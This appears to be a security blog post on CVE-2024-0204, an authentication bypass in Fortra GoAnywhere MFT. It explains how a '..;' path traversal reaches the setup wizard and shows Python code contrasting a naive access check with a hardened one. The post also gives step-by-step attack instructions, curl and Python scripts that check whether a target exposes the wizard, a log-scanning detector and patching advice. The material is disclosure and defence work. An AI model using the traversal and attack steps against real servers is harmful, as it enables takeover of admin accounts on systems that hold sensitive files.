On January 22, 2024, Fortra disclosed a critical vulnerability, CVE-2024-0204 (CVSS 9.8), in its GoAnywhere Managed File Transfer (MFT) product. It affects all 7.x releases before 7.4.1 (and 6.x from 6.0.1 onward). The flaw lets an unauthenticated attacker create a brand new administrator account by reaching the product's first-run setup wizard through a path-traversal trick against the administration portal. In this post, we'll explore what happened, how the exploit works (with code examples), and what organizations must do to stay safe.
What is Fortra GoAnywhere MFT?
Fortra's GoAnywhere MFT is a secure file transfer solution used by organizations globally for sending, storing, and automating the movement of sensitive data. It is popular in finance, healthcare, government, and many other sectors, which is exactly why it is an attractive target.
What is CVE-2024-0204?
This vulnerability is an authentication bypass. Normally you need valid admin credentials to add users or change critical settings. The admin portal also ships a first-run setup wizard that creates the initial administrator on a fresh install and is supposed to be unreachable once setup is complete. Because of this bug, anyone who can reach the admin portal can get back into that wizard with a specially crafted URL path and create a fresh admin account without ever logging in.
Status:
Fixed in: v7.4.1 (released December 7, 2023); Fortra published the security advisory on January 22, 2024
CVE Link:
- NVD - CVE-2024-0204
1. The Setup
GoAnywhere's admin portal ships a one-time account setup wizard at /goanywhere/wizard/InitialAccountSetup.xhtml, the JSF page that creates the first administrator on a new install. After setup has run, an access check is supposed to turn away any further request for that page. The check, however, looks at the request URI as received, while the servlet container (Tomcat) normalizes the path before dispatching. A URI such as /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml slips past as if it were a request for an image, because Tomcat treats the ;-suffix as a path parameter, strips it, and then resolves the .. segment, so the request lands on the wizard anyway. No credentials are involved at any point.
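To see why the traversal works, here is an added example (my own Python model, not Fortra's code) of an access check that matches on the raw request URI, next to a hardened one that normalizes the path first. The container_normalize helper approximates what Tomcat does before routing (strip ;path-parameters, percent-decode, resolve . and ..); the paths used are the real wizard path and the traversal form from Horizon3.ai's writeup, and the PROTECTED_PREFIX and function names are my own.

```python
"""
Added example: why a raw-URI access check is bypassed by '/..;/' traversal on a
servlet container such as Tomcat, and what the check should do instead.
Not GoAnywhere's code; a minimal model of the bug class.
"""
from urllib.parse import unquote

# The one-time setup wizard lives here and must be unreachable after setup.
PROTECTED_PREFIX = "/goanywhere/wizard/"


def naive_filter_blocks(request_uri: str) -> bool:
    """Flawed pattern: match the URI exactly as the client sent it.
    '/goanywhere/images/..;/wizard/...' looks like an image request here."""
    return request_uri.startswith(PROTECTED_PREFIX)


def container_normalize(request_uri: str) -> str:
    """Approximation of what the servlet container does before dispatching:
    drop the query string, strip ';param' from each segment (Tomcat treats
    these as path parameters), percent-decode, then resolve '.' and '..'."""
    path = request_uri.split("?", 1)[0]
    segments = []
    for seg in path.split("/"):
        seg = unquote(seg.split(";", 1)[0])
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def hardened_filter_blocks(request_uri: str) -> bool:
    """Fixed pattern: normalize the same way the container will, then match."""
    return container_normalize(request_uri).startswith(PROTECTED_PREFIX)


def reject_outright(request_uri: str) -> bool:
    """Belt and braces: this application never needs ';' path parameters or
    '..' segments, so refuse them before making any routing decision."""
    path = request_uri.split("?", 1)[0]
    return ";" in path or ".." in unquote(path)


if __name__ == "__main__":
    bypass = "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"
    for uri in ("/goanywhere/wizard/InitialAccountSetup.xhtml",
                bypass,
                "/goanywhere/images/%2e%2e;/wizard/InitialAccountSetup.xhtml",
                "/goanywhere/images/logo.png"):
        print(f"{uri}\n  container sees : {container_normalize(uri)}"
              f"\n  naive blocks   : {naive_filter_blocks(uri)}"
              f"\n  hardened blocks: {hardened_filter_blocks(uri)}"
              f"\n  reject outright: {reject_outright(uri)}")
```

The lesson generalizes beyond this CVE: any path-based access check that runs before container normalization must normalize identically, or reject URIs containing path parameters and dot segments outright. Better still, tie the wizard page itself to the "setup already completed" state so that no URL shape can reach it.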
2. The Attack
Step 1:
Send a GET request for the wizard through the traversal path and confirm the setup page is served. A real run also keeps the session cookie and the JSF view-state token issued with the page, since the wizard form will not accept a submission without them.
Step 2:
POST the wizard's form through the same path with the username and password you want for the new administrator.
Step 3:
Log in to the admin portal with those credentials and you have full admin access.
Here's a cURL one-liner that only checks whether the wizard is reachable through the traversal. It is a non-destructive test and does not create an account; the full proof of concept, including the form submission, is in Horizon3.ai's writeup. The --path-as-is flag stops cURL from rewriting the dot segments itself:
curl -k -s --path-as-is -o /dev/null -w '%{http_code}\n' \
  'https://victim.example.com/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml'
What's happening: a vulnerable install answers 200 and renders the setup form to an unauthenticated client. Anything else (a redirect to the login page, an error, or no page at all after the file-deletion mitigation from Fortra's advisory) means the wizard is not exposed.
Here's the same reachability check in Python using requests
import sys
import requests
import urllib3

# Appliances often run self-signed certificates; verify=False mirrors curl -k.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Real wizard path, reached through the ..; traversal that dodges the access check.
WIZARD = "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"

def wizard_reachable(base_url):
    # allow_redirects=False: a redirect to the login page means the check held.
    resp = requests.get(base_url.rstrip("/") + WIZARD, verify=False,
                        allow_redirects=False, timeout=10)
    print(f"Status: {resp.status_code}")
    # The marker string is an assumption; confirm it against a known-vulnerable lab instance.
    return resp.status_code == 200 and "InitialAccountSetup" in resp.text

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "https://victim.example.com"
    if wizard_reachable(target):
        print("VULNERABLE: setup wizard served to an unauthenticated client")
    else:
        print("Wizard not reachable (patched, mitigated, or filtered)")
Real World Impact
This is a game-over flaw for the appliance. Anyone who can reach the admin portal over the network (often plain HTTP/HTTPS) can create an administrator and, from there:
Read, modify, or exfiltrate the files the server transfers, create further accounts, change configuration, plant backdoors, or disrupt services.
Ransomware groups have targeted GoAnywhere before: the Clop gang exploited CVE-2023-0669, a pre-authentication RCE in the same product, against roughly 130 organizations in early 2023 (see BleepingComputer coverage). A bug like this one is a goldmine for criminals.
Who Discovered It?
- Fortra credits Mohammed Eldeeb and Islam Elrfai of Spark Engineering Consultants with reporting the issue, and published the advisory on its GoAnywhere security advisories page on January 22, 2024.
- Horizon3.ai released a technical deep-dive and proof-of-concept code (Horizon3.ai blog, by Zach Hanley) the following day, so exploitation details were public almost immediately.
What Should You Do?
1. Patch. Upgrade to GoAnywhere MFT 7.4.1 or later. If you cannot upgrade right away, apply the mitigation from Fortra's advisory: delete the InitialAccountSetup.xhtml file from the installation directory (for container deployments, replace it with an empty file) and restart the GoAnywhere services, which removes the wizard page entirely.
2. Check for compromise. Open the Admin Users list in the admin portal and look for accounts you did not create. Check your logs (the portal's audit logs and any reverse-proxy or WAF access logs in front of it) for requests to InitialAccountSetup.xhtml or for paths containing ..;, especially around the time the advisory went public.
3. Restrict admin portal access. Use network segmentation or firewall rules so that only trusted administrators can reach the admin login; it should never be exposed to the internet.
4. Reset credentials. If you find signs of compromise, reset passwords for existing admin users and rotate any keys or secrets an attacker with admin access could have read.
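For the log review in step 2, here is an added example (my own Python, not a Fortra tool) that scans web access logs in Apache/Nginx combined format, as written by a reverse proxy or WAF in front of GoAnywhere, and flags two independent signals: a ..; path-parameter traversal anywhere in the raw path, and any request for the setup wizard page at all. The log lines are constructed for the example; the field names, the sample IPs and the helper names are my own.

```python
"""
Added example: flag attempts to reach the GoAnywhere setup wizard through the
'/..;/' traversal in combined-format access logs. Not part of the original
post or of Fortra's product; sample log lines are constructed.
"""
import re

# Constructed sample: two wizard requests from one source plus benign traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [22/Jan/2024:19:02:11 +0000] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 4821 "-" "python-requests/2.31.0"
203.0.113.10 - - [22/Jan/2024:19:02:12 +0000] "POST /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 302 0 "-" "python-requests/2.31.0"
198.51.100.7 - - [22/Jan/2024:19:03:40 +0000] "GET /goanywhere/images/logo.png HTTP/1.1" 200 1533 "-" "Mozilla/5.0"
198.51.100.7 - - [22/Jan/2024:19:04:01 +0000] "POST /goanywhere/auth/Login.xhtml HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD path proto" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Signal 1: a '..' segment carrying a ';' path parameter, plain or percent-encoded.
# The application has no legitimate use for this shape.
TRAVERSAL = re.compile(r'(?:\.\.|%2e%2e|\.%2e|%2e\.);', re.IGNORECASE)
# Signal 2: the one-time wizard page should never be requested after setup.
WIZARD = re.compile(r'InitialAccountSetup\.xhtml', re.IGNORECASE)


def classify(path: str) -> list[str]:
    """Return the reasons a raw request path is suspicious (empty if none)."""
    reasons = []
    if TRAVERSAL.search(path):
        reasons.append("path-parameter traversal (..;)")
    if WIZARD.search(path):
        reasons.append("setup wizard requested")
    return reasons


def find_suspicious(log_text: str) -> list[dict]:
    """Parse combined-format lines and return the suspicious ones, in order."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reasons = classify(m["path"])
        if reasons:
            hits.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                         "path": m["path"], "status": int(m["status"]),
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in find_suspicious(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]} {h["method"]} {h["status"]} {h["path"]}'
              f' -> {", ".join(h["reasons"])}')
```

A 200 on the GET followed by a POST to the same traversal path from one source is the pattern to escalate on: the page was served and a form was submitted. Match on the raw path rather than a normalized one, because the traversal only shows up before normalization, and treat a wizard hit without a traversal as equally worth a look, since other URL encodings may reach the same page.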
Official Fortra Advisory:
- https://community.fortra.com/knowledge-base/goanywhere-mft/securing-goanywhere-cve-2024-0204/
Further Reading & References
- NVD CVE-2024-0204
- Fortra Security Bulletin
- Horizon3.ai Analysis & PoC
- BleepingComputer report
In Summary
CVE-2024-0204 is one of the most severe bugs seen in file transfer products in 2024. If you use GoAnywhere MFT, check your version today. Attackers need only a couple of unauthenticated requests to turn themselves into an all-powerful admin. Protect your data, patch now (or delete the wizard page as Fortra advises), and lock down your admin portal!
Stay safe out there!
Credits: This writeup is based on official advisories, security research, and reverse engineering by the infosec community. For exclusive, step-by-step coverage, follow trusted cybersecurity blogs and advisories.
Timeline
Published on: 01/22/2024 18:15:20 UTC
Last modified on: 02/02/2024 17:15:11 UTC